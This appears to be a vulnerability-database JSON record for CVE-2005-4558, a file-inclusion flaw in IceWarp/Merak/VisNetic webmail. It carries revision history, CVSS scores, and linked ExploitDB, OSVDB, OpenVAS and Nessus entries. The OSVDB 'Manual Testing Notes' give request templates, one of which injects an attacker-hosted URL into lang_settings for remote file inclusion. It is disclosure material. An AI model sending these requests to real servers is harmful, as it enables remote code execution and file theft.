ID CVE-2005-4558 Type cve Reporter NVD Modified 2017-07-19T21:29:18
Description
IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.
{"id": "CVE-2005-4558", "bulletinFamily": "NVD", "title": "CVE-2005-4558", "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "published": "2005-12-28T06:03:00", "modified": "2017-07-19T21:29:18", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "reporter": "NVD", "references": ["http://www.securityfocus.com/bid/16069", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "https://exchange.xforce.ibmcloud.com/vulnerabilities/23904", "http://marc.info/?l=full-disclosure&m=113570229524828&w=2"], "cvelist": ["CVE-2005-4558"], "type": "cve", "lastseen": "2017-07-20T10:48:59", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "cvelist": ["CVE-2005-4558"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "edition": 2, "enchantments": {}, "hash": "2b56aa45a3045cf108b835b4824c06d83abfa21ac3d78ac8d48403cf3dc910fc", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "524d402ab5981cafd25a2cb71b6fd0f1", "key": "modified"}, {"hash": "a35d8495986cceb5eef36d5c66a78c02", "key": "cpe"}, {"hash": "45393995c7975feeef903ec9bc61c0c7", "key": "title"}, {"hash": "028daec84724be9a5101b0ea56cf3762", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "fd12c73fb3e40003139d7c0288f1e56e", "key": "references"}, {"hash": "a865e895a225442672cab2c70aff5573", "key": "cvelist"}, {"hash": "7a295911aadc67471369f116cafd1277", "key": "href"}, {"hash": "703e0b2717a66eca1d1ae76405ec97cd", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "id": "CVE-2005-4558", "lastseen": "2017-04-18T15:51:41", "modified": "2016-10-17T23:38:25", "objectVersion": "1.2", "published": "2005-12-28T06:03:00", "references": ["http://www.securityfocus.com/bid/16069", "http://xforce.iss.net/xforce/xfdb/23904", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "http://marc.info/?l=full-disclosure&m=113570229524828&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-4558", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-04-18T15:51:41"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "cvelist": ["CVE-2005-4558"], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "IceWarp Web Mail 5.5.1, as used by Merak Mail Server 8.3.0r and VisNetic Mail Server version 8.3.0 build 1, does not properly restrict acceptable values for the language parameter to mail/settings.html before it is stored in a database, which can allow remote authenticated users to include arbitrary PHP code via a URL in a modified lang_settings parameter to mail/index.html.", "edition": 1, "hash": "b94f69a11608abfbec3683960bdf0b3826fcda1d803903d5d6b54324897c0538", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "a35d8495986cceb5eef36d5c66a78c02", "key": "cpe"}, {"hash": "45393995c7975feeef903ec9bc61c0c7", "key": "title"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "028daec84724be9a5101b0ea56cf3762", "key": "published"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "38efea00311c193e8f76d5a2f51684ee", "key": "modified"}, {"hash": "9acfc3ecd06539a3534549fd05dfad8e", "key": "cvss"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "737828fbfa76bc50c8a482845fdd6704", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "a865e895a225442672cab2c70aff5573", "key": "cvelist"}, {"hash": "7a295911aadc67471369f116cafd1277", "key": "href"}, {"hash": "703e0b2717a66eca1d1ae76405ec97cd", "key": "description"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4558", "id": "CVE-2005-4558", "lastseen": "2016-09-03T06:13:14", "modified": "2008-09-05T16:57:11", "objectVersion": "1.2", "published": "2005-12-28T06:03:00", "references": ["http://www.securityfocus.com/bid/16069", "http://xforce.iss.net/xforce/xfdb/23904", "http://www.securityfocus.com/archive/1/archive/1/420255/100/0/threaded", "http://securitytracker.com/id?1015412", "http://marc.theaimsgroup.com/?l=full-disclosure&m=113570229524828&w=2"], "reporter": "NVD", "scanner": [], "title": "CVE-2005-4558", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2016-09-03T06:13:14"}], "edition": 3, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a35d8495986cceb5eef36d5c66a78c02"}, {"key": "cvelist", "hash": "a865e895a225442672cab2c70aff5573"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "703e0b2717a66eca1d1ae76405ec97cd"}, {"key": "href", "hash": "7a295911aadc67471369f116cafd1277"}, {"key": "modified", "hash": "f231d0748ed9a30a0db96dc038bebd15"}, {"key": "published", "hash": "028daec84724be9a5101b0ea56cf3762"}, {"key": "references", "hash": "95b426f026069964f5d5209d9bf891bc"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "45393995c7975feeef903ec9bc61c0c7"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "230e311ca8df6c29733c7e512b43f825c7a065e25e207a315e403e6ca170429f", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:icewarp:web_mail:5.5.1", "cpe:/a:merak:mail_server:8.3.0r", "cpe:/a:deerfield:visnetic_mail_server:8.3.0_build1"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"result": {"exploitdb": [{"id": "EDB-ID:26982", "type": "exploitdb", "title": "IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusion", "description": "IceWarp Universal WebMail /mail/settings.html Language Parameter Local File Inclusiona. CVE-2005-4558 . Webapps exploit for php platform", "published": "2005-12-27T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26982/", "cvelist": ["CVE-2005-4558"], "lastseen": "2016-02-03T04:50:46"}, {"id": "EDB-ID:26983", "type": "exploitdb", "title": "IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion", "description": "IceWarp Universal WebMail /mail/index.html lang_settings Parameter Remote File Inclusion. CVE-2005-4558. Webapps exploit for php platform", "published": "2005-12-27T00:00:00", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/26983/", "cvelist": ["CVE-2005-4558"], "lastseen": "2016-02-03T04:50:54"}], "osvdb": [{"id": "OSVDB:22081", "type": "osvdb", "title": "IceWarp WebMail /mail/index.html lang_settings Variable Remote File Inclusion", "description": "## Vulnerability Description\nVisNetic Mail Server Webmail contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /mail/index.html not properly sanitizing user input supplied to the \"lang_settings\" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Solution Description\nUpgrade to version 8.3.5.r (Merak Mail Server), 8.3.5 (Visnetic WebMail), or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nVisNetic Mail Server Webmail contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to /mail/index.html not properly sanitizing user input supplied to the \"lang_settings\" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]:32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://[attacker]/;\n## References:\nVendor URL: http://www.deerfield.com/download/visnetic-mailserver/\n[Secunia Advisory ID:17865](https://secuniaresearch.flexerasoftware.com/advisories/17865/)\n[Related OSVDB ID: 22079](https://vulners.com/osvdb/OSVDB:22079)\n[Related OSVDB ID: 22082](https://vulners.com/osvdb/OSVDB:22082)\n[Related OSVDB ID: 22077](https://vulners.com/osvdb/OSVDB:22077)\n[Related OSVDB ID: 22078](https://vulners.com/osvdb/OSVDB:22078)\n[Related OSVDB ID: 22080](https://vulners.com/osvdb/OSVDB:22080)\nOther Advisory URL: http://secunia.com/secunia_research/2005-62/advisory/\n[Nessus Plugin ID:20346](https://vulners.com/search?query=pluginID:20346)\n[CVE-2005-4558](https://vulners.com/cve/CVE-2005-4558)\nBugtraq ID: 16069\n", "published": "2005-12-27T10:03:16", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:22081", "cvelist": ["CVE-2005-4558"], "lastseen": "2017-04-28T13:20:19"}, {"id": "OSVDB:22080", "type": "osvdb", "title": "IceWarp WebMail /mail/settings.html Language Variable Local File Inclusion", "description": "## Vulnerability Description\nVisNetic Mail Server Webmail contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when improper information is assigned to the \"language\" variable when calling the /mail/settings.html script, which will display arbitrary files on the server's filesystem resulting in a loss of confidentiality.\n## Solution Description\nUpgrade to version 8.3.5.r (Merak Mail Server), 8.3.5 (Visnetic WebMail), or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nVisNetic Mail Server Webmail contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when improper information is assigned to the \"language\" variable when calling the /mail/settings.html script, which will display arbitrary files on the server's filesystem resulting in a loss of confidentiality.\n## Manual Testing Notes\nhttp://[target]:32000/mail/settings.html?id=[current_id]&Save_x=1&language=TEST\n## References:\nVendor URL: http://www.deerfield.com/download/visnetic-mailserver/\n[Secunia Advisory ID:17865](https://secuniaresearch.flexerasoftware.com/advisories/17865/)\n[Related OSVDB ID: 22079](https://vulners.com/osvdb/OSVDB:22079)\n[Related OSVDB ID: 22082](https://vulners.com/osvdb/OSVDB:22082)\n[Related OSVDB ID: 22077](https://vulners.com/osvdb/OSVDB:22077)\n[Related OSVDB ID: 22078](https://vulners.com/osvdb/OSVDB:22078)\n[Related OSVDB ID: 22081](https://vulners.com/osvdb/OSVDB:22081)\nOther Advisory URL: http://secunia.com/secunia_research/2005-62/advisory/\n[Nessus Plugin ID:20346](https://vulners.com/search?query=pluginID:20346)\n[CVE-2005-4558](https://vulners.com/cve/CVE-2005-4558)\nBugtraq ID: 16069\n", "published": "2005-12-27T10:03:16", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:22080", "cvelist": ["CVE-2005-4558"], "lastseen": "2017-04-28T13:20:19"}], "openvas": [{"id": "OPENVAS:136141256231020346", "type": "openvas", "title": "VisNetic / Merak Mail Server multiple flaws", "description": "The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.", "published": "2006-03-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231020346", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "lastseen": "2018-04-06T11:15:49"}, {"id": "OPENVAS:20346", "type": "openvas", "title": "VisNetic / Merak Mail Server multiple flaws", "description": "The remote webmail server is affected by multiple vulnerabilities \nwhich may allow an attacker to execute arbitrary commands on the remote\nhost.\n\nDescription:\n\nThe remote host is running VisNetic / Merak Mail Server, a\nmulti-featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of\nthis software are prone to multiple flaws. An attacker could send\nspecially-crafted URLs to execute arbitrary scripts, perhaps taken\nfrom third-party hosts, or to disclose the content of files on the\nremote system.", "published": "2006-03-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=20346", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "lastseen": "2017-12-08T11:44:05"}], "nessus": [{"id": "VISNETIC_MAILSERVER_FLAWS.NASL", "type": "nessus", "title": "VisNetic / Merak Mail Server Multiple Remote Vulnerabilities", "description": "The remote host is running VisNetic / Merak Mail Server, a multi- featured mail server for Windows. \n\nThe webmail and webadmin services included in the remote version of this software are prone to multiple flaws. An attacker could send specially crafted URLs to execute arbitrary scripts, perhaps taken from third-party hosts, or to disclose the content of files on the remote system.", "published": "2005-12-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=20346", "cvelist": ["CVE-2005-4559", "CVE-2005-4557", "CVE-2005-4558", "CVE-2005-4556"], "lastseen": "2016-09-26T17:24:26"}]}}
